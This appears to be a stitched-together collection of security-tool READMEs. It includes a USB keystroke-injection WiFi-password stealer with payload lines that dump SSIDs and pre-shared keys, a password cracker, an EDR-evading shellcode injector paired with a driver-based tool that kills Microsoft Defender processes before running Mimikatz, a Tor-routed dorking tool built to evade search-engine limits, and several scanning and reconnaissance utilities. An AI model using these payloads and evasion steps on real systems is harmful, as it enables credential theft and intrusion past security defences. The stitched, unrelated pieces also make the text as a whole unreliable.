Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.
| STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
| STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
| STRING echo PASSWORD | sudo -S echo |
| STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICKwhere PASSWORD is your account's password and USBSTICK is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
| Wireless_Network_Name Password | |
| --------------------- -------- | |
| WLAN1 pass1 | |
| WLAN2 pass2 | |
| WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.ddThis pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock bug.sudo.
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.gitTo install the required libraries, run the following command:
$ pip install -r requirements.txtTo run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]-h,--help: show this help message and exit-t,--target: Target IP address or subnet (default: 192.168.1.0/24)-i,--interface: Interface to use (default: None)-l,--live: Enable live tracking of devices-o,--output: Output file to save the results-m,--manufacturer: Filter by manufacturer (e.g., 'Apple')-r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')-s,--scan-rate: Scan rate in seconds (default: 5)$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -lYou can save the scan results to a file by using the -o or --output flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address ┃ MAC Address ┃ Packet Size ┃ Manufacturer ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.1.1 │ **:6e:**:97:**:28 │ 102 │ ASUSTek COMPUTER INC. │
│ 192.168.1.3 │ 00:**:22:**:12:** │ 102 │ InPro Comm │
│ 192.168.1.2 │ **:32:**:bf:**:00 │ 102 │ Xiaomi Communications Co Ltd │
│ 192.168.1.98 │ d4:**:64:**:5c:** │ 102 │ ASUSTek COMPUTER INC. │
│ 192.168.1.25 │ **:49:**:00:**:38 │ 102 │ Unknown │
└──────────────┴───────────────────┴─────────────┴──────────────────────────────┘
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.gitInstall the required dependencies:
pip install -r requirements.txtpython passbreaker.py <password_hash> <wordlist_file> [--algorithm]Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).-s, --salt <salt>: Specify a salt value to use.-p, --parallel: Enable parallel processing for faster cracking.-c, --complexity: Evaluate password complexity before cracking.-b, --brute-force: Perform a brute force attack.--min-length <min_length>: Set the minimum password length for brute force attacks.--max-length <max_length>: Set the maximum password length for brute force attacks.--character-set <character_set>: Set the character set to use for brute force attacks.Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım örneği:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexityThis command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallelThis command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.
Clone the repository:
git clone https://github.com/HalilDeniz/TrafficWatch.gitNavigate to the project directory:
cd TrafficWatchInstall the required dependencies:
pip install -r requirements.txtpython3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]
Packet Sniffer Tool
options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display
To analyze packets from a PCAP file, use the following command:
python trafficwatch.py -f path/to/your.pcapTo specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:
python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10-f or --file: Path to the PCAP file for analysis.-p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).-c or --count: Limit the number of displayed packets.Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.
If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:
This project is licensed under the MIT License.
Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!"
(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.
To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.
Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).
.\RecycledInjector.exe <path_to_shellcode_file>This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.
On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.
kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories.
apt-get package manager.To install KaliPm, you can simply clone the repository from GitHub:
git clone https://github.com/HalilDeniz/KaliPackergeManager.git
chmod +x kalipm.sh
./kalipm.sh
KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.
Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:
If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:
DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.
Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.
The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.
We have enabled every supported upstream search engine that allows advanced search operator queries:
GoogleDuckDuckGoQwantBingBraveStartpageYahooFor more information about what search engines SearXNG supports See: Configured Engines
Install DorXNG
git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h
Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst
docker run researchanddestroy/searxng:latest
If you would like to build the container yourself:
git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>
By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.
Start Issuing Search Queries
./DorXNG.py -q 'search query'
Query the DorXNG Database
./DorXNG.py -D 'regex search string'
-h, --help show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output
Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries.
Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly.
Most often, the more passes you make over a search query the more results you'll find.
Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all.
Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.
Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename, the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations seperate it's there for you.
Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.
If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:
HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one. HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!
There really isn't a reason to run a ton of these containers... Yet... How many you run really depends on what you're doing. Each container uses approximately 1.25GBs of RAM.
Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.
Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.
When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).
Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit...
The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good.
If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...
Those Python Stack Frames are Thicc...
We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.
The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.
Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.
The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py
We've already run through it for you... Our ghdb.db file contains over one million entries and counting! 朗 You can download it here ghdb.db if you'd like a copy.
Example of querying the ghdb.db database:
./DorXNG.py -d ghdb.db -D '^http.*\.sql$'
A rewrite of DorXNG in Golang is already in the works. (GorXNG? | DorXNGNG?)
We're gonna need more dorks... Check out DorkGPT
Single Search Query
./DorXNG.py -q 'search query'
Concurrent Search Queries
./DorXNG.py -q 'search query' -c4
Page Iteration Mode
./DorXNG.py -q 'search query' -n4
Iterative Concurrent Search Queries
./DorXNG.py -q 'search query' -c4 -n64
Server List Iteration Mode
./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0
Query List Iteration Mode
./DorXNG.py -Q query.lst -c4 -n64
Query and Server List Iteration
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0
Main Function Loop Iteration Mode
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4
Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10
Merging a Database (One at a Time) into a New Database File
./DorXNG.py -d new-database.db -m dorxng.db
Merge All Database Files in the Current Working Directory into a New Database File
for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done
Query a Database
./DorXNG.py -d new-database.db -D 'regex search string'
Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.
git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 analyzer.py -d target-web.com
You can run this application on a container after build a Dockerfile.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d target-web.com
docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d target-web.com
-d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json
https://github.com/OsmanKandemir/indicator-intelligence
https://github.com/stamparm/blackbook
https://github.com/stamparm/ipsum
xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.
Fetches domains from curated passive sources to maximize results.
Supports stdin and stdout for easy integration into workflows.
Cross-Platform (Windows, Linux & macOS).
Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:
...with wget:
wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz...or, with curl:
curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz...then, extract the binary:
tar xf xsubfind3r-<version>-linux-amd64.tar.gzTIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.
...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latestgo build ... the development VersionClone the repository
git clone https://github.com/hueristiq/xsubfind3r.git Build the utility
cd xsubfind3r/cmd/xsubfind3r && \
go build .Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xsubfind3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.
NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.
Example config.yaml:
version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8To display help message for xsubfind3r use the -h flag:
xsubfind3r -hhelp message:
_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0
USAGE:
xsubfind3r [OPTIONS]
INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path
SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude
OPTIMIZATION:
-t, --threads int number of threads (default: 50)
OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)
CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.
.js, .json, .xml, .csv, .txt & .map).robots.txt.Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:
...with wget:
wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz...or, with curl:
curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz...then, extract the binary:
tar xf xcrawl3r-<version>-linux-amd64.tar.gzTIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.
...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latestgo build ... the development VersionClone the repository
git clone https://github.com/hueristiq/xcrawl3r.git Build the utility
cd xcrawl3r/cmd/xcrawl3r && \
go build .Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xcrawl3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.
NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
To display help message for xcrawl3r use the -h flag:
xcrawl3r -hhelp message:
_ _____
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0
A CLI utility to recursively crawl webpages.
USAGE:
xcrawl3r [OPTIONS]
INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl
CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.
RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)
OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)
Issues and Pull Requests are welcome! Check out the contribution guidelines.
This utility is distributed under the MIT license.
Alternatives - Check out projects below, that may fit in your workflow:
xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.
robots.txt snapshots.Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:
...with wget:
wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz...or, with curl:
curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz...then, extract the binary:
tar xf xurlfind3r-<version>-linux-amd64.tar.gzTIP: The above steps, download and extract, can be combined into a single step with this onliner
curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv
NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.
...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.
Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.
go install ...go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latestgo build ... the development VersionClone the repository
git clone https://github.com/hueristiq/xurlfind3r.git Build the utility
cd xurlfind3r/cmd/xurlfind3r && \
go build .Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:
sudo mv xurlfind3r /usr/local/bin/NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.
NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.
xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.
Example config.yaml:
version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8To display help message for xurlfind3r use the -h flag:
xurlfind3r -hhelp message:
_ __ _ _ _____
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0
USAGE:
xurlfind3r [OPTIONS]
TARGET:
-d, --domain string (sub)domain to match URLs
SCOPE:
--include-subdomains bool match subdomain's URLs
SOURCES:
-s, --sources bool list sources
